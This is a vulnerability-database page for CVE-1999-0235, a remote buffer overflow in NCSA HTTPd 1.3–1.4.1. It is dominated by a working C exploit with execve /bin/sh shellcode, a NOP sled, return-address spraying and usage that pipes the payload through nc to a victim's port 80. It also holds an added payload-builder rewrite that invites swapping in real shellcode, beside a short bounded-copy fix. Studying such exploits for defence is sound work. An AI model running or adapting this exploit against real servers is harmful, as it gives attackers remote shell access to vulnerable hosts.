NCSA WebServer Buffer Overflow Vulnerability

Vulnerability ID 1105238    Vulnerability type: Buffer overflow
Published 1995-02-17    Updated 2005-10-20
CVE ID CVE-1999-0235
CNNVD-ID CNNVD-199502-002
Platform Linux    CVSS score 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/21050
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199502-002
|Vulnerability details
NCSA WebServer (versions 1.4.1 and earlier) contains a buffer overflow vulnerability that is exploitable by a remote attacker.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/3158/info

NCSA HTTPd is a free, open-source web server for *nix systems.

NCSA HTTPd versions 1.3 and earlier are prone to an exploitable buffer overflow (in the username field) which will allow malicious remote users to execute arbitrary code with the privileges of the webserver process.

Successful exploitation of this vulnerability will allow a remote attacker to gain local access to the host.

/*     
; NCSA Webserver Buffer Overflow in 1.3 
; 	By Xtremist ([email protected]) for [r00tabega.security.labs]
; Tested on Slackware 4.0 with NCSA 1.3  
;     usage:
; 	$ (ncsaexpl 0; cat) | nc victim 80
;                   
;                    OFFSET usually from -1000 to 1000 
;   greets all people i know :)
;*/

#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* strlen, memcpy */
#include <stdint.h>   /* uint32_t */

unsigned char shell[] = /*  alphae1's shellcode for execve */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Payload buffer: NOP sled + shellcode in the first 260 bytes, copies of the
 * guessed return address after that, plus room for a terminating NUL so the
 * printf("%s") below stops at a known length. The original declared 264 bytes
 * and its last 4-byte write ran one byte past the end. */
char user[268];

/* Return the current stack pointer. 32-bit x86 only (build with -m32); the
 * exploit assumes the target's stack sits near the attacker's, hence the
 * offset guess passed on the command line. */
long get_esp(void) {
	long esp;
	__asm__("movl %%esp,%0" : "=r"(esp));
	return esp;
}

int main(int argc,char **argv){

int i; int offset=160;
uint32_t ret;
if(argc>1) {
  offset=atoi(argv[1]);
}
ret=(uint32_t)(get_esp()-offset);

/* Spray the guessed return address through the buffer, 4 bytes at a time,
 * starting at index 1 as in the original. */
for(i=1;i<264;i+=4){
*(uint32_t *)&user[i]=ret;
}

/* Overwrite the front with a NOP sled so any landing point inside it
 * slides into the shellcode. */
for(i=0;i<(260-(int)strlen((char *)shell));i++) {
*(user+i)=0x90; /*NOP*/
}

/* Place the shellcode right after the sled. (The original copied into
 * shell+i, which overruns the shellcode array; the target is user+i.) */
memcpy(user+i,shell,strlen((char *)shell));
user[265]='\0';

/* HTTP/0.9-style request line: the overlong path is what overflows. */
printf("GET %s\n", user);
return 0;
}
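The exploit above builds one fixed layout (NOP sled, shellcode, repeated return address) and pushes it out through printf("GET %s\n"), so a NUL, CR, LF, space or tab anywhere in the sled, shellcode or guessed return address silently truncates or splits the request line before it reaches the server. The following is an added example written for this page, not code from the exploit author, the SecurityFocus advisory or NCSA: it rebuilds the same layout with explicit bounds, adds that transport check, and shows the bounded path copy that closes this class of bug. The shellcode bytes are a constructed NUL-free dummy, 0xbffff5a0 is an assumed stack address, and PATH_BUF = 256 is an assumed server buffer size (the 260-byte sled in the exploit suggests a buffer of roughly that size, but the value is not taken from NCSA HTTPd source).

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Editor's added example; not code from the original page, the exploit author
 * or NCSA. PATH_BUF is an assumed server-side buffer size. */
#define PATH_BUF 256

/* Constructed stand-in for the execve shellcode (NUL-free dummy bytes) so the
 * layout is easy to verify; swap in real shellcode for actual use. */
static const unsigned char DUMMY_SC[] = { 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68 };

/* Lay out [NOP sled][shellcode][ret x nret] into out, exactly total bytes.
 * ret is written little-endian (32-bit x86). Returns bytes written, or 0 if
 * the pieces do not fit in total or total does not fit in out. */
size_t build_payload(unsigned char *out, size_t outlen, size_t total,
                     uint32_t ret, const unsigned char *sc, size_t sclen,
                     size_t nret)
{
    if (total > outlen || nret == 0 || total < sclen + 4 * nret)
        return 0;
    size_t nops = total - sclen - 4 * nret;
    memset(out, 0x90, nops);                 /* sled: any hit slides forward */
    memcpy(out + nops, sc, sclen);           /* shellcode right after the sled */
    for (size_t pos = nops + sclen; pos < total; pos += 4) {
        out[pos]     = (unsigned char)(ret & 0xff);
        out[pos + 1] = (unsigned char)((ret >> 8) & 0xff);
        out[pos + 2] = (unsigned char)((ret >> 16) & 0xff);
        out[pos + 3] = (unsigned char)((ret >> 24) & 0xff);
    }
    return total;
}

/* The exploit ships the payload with printf("GET %s\n"): a NUL ends the %s,
 * CR/LF ends the request line, and SP/TAB ends the path token. Any of these
 * inside the sled, shellcode or return address truncates the attack.
 * Returns 1 if every byte survives that transport, 0 otherwise. */
int request_line_safe(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (p[i] == 0x00 || p[i] == 0x0a || p[i] == 0x0d ||
            p[i] == 0x20 || p[i] == 0x09)
            return 0;
    }
    return 1;
}

/* The fix for this bug class: check the length before copying the path into
 * a fixed buffer instead of an unbounded strcpy(). Returns 0 on success,
 * -1 if the path does not fit together with its terminator. */
int copy_path_bounded(char *dst, size_t dstlen,
                      const unsigned char *src, size_t srclen)
{
    if (srclen >= dstlen)
        return -1;
    memcpy(dst, src, srclen);
    dst[srclen] = '\0';
    return 0;
}

int main(void)
{
    unsigned char payload[512];
    char path[PATH_BUF];
    /* 0xbffff5a0 is an assumed stack address; the real exploit derives its
     * guess from its own ESP minus a user-supplied offset. */
    size_t n = build_payload(payload, sizeof payload, 264, 0xbffff5a0u,
                             DUMMY_SC, sizeof DUMMY_SC, 2);
    if (n == 0 || !request_line_safe(payload, n)) {
        fprintf(stderr, "payload unusable: bad length or line-breaking byte\n");
        return 1;
    }
    fprintf(stderr, "bounded copy of %zu-byte path: %s\n", n,
            copy_path_bounded(path, sizeof path, payload, n) == 0
                ? "accepted" : "rejected");
    /* Same framing as the original exploit; pipe into nc as its usage shows. */
    fputs("GET ", stdout);
    fwrite(payload, 1, n, stdout);
    fputc('\n', stdout);
    return 0;
}
```

With the assumed 256-byte server buffer the 264-byte request is rejected by copy_path_bounded, which is the whole point of the fix; the same request passes request_line_safe, whereas a return address such as 0xbfff0a20 (containing 0x0a and 0x20) would not, and the exploit as published would have sent a truncated line without noticing.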
|References
Vulnerable software and versions (Configuration 1, OR; * denotes vulnerable software):
* cpe:/a:ncsa:ncsa_web_server:1.3
* cpe:/a:ncsa:ncsa_web_server:1.4
* cpe:/a:ncsa:ncsa_web_server:1.4.1
CVE standard vulnerability entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0235
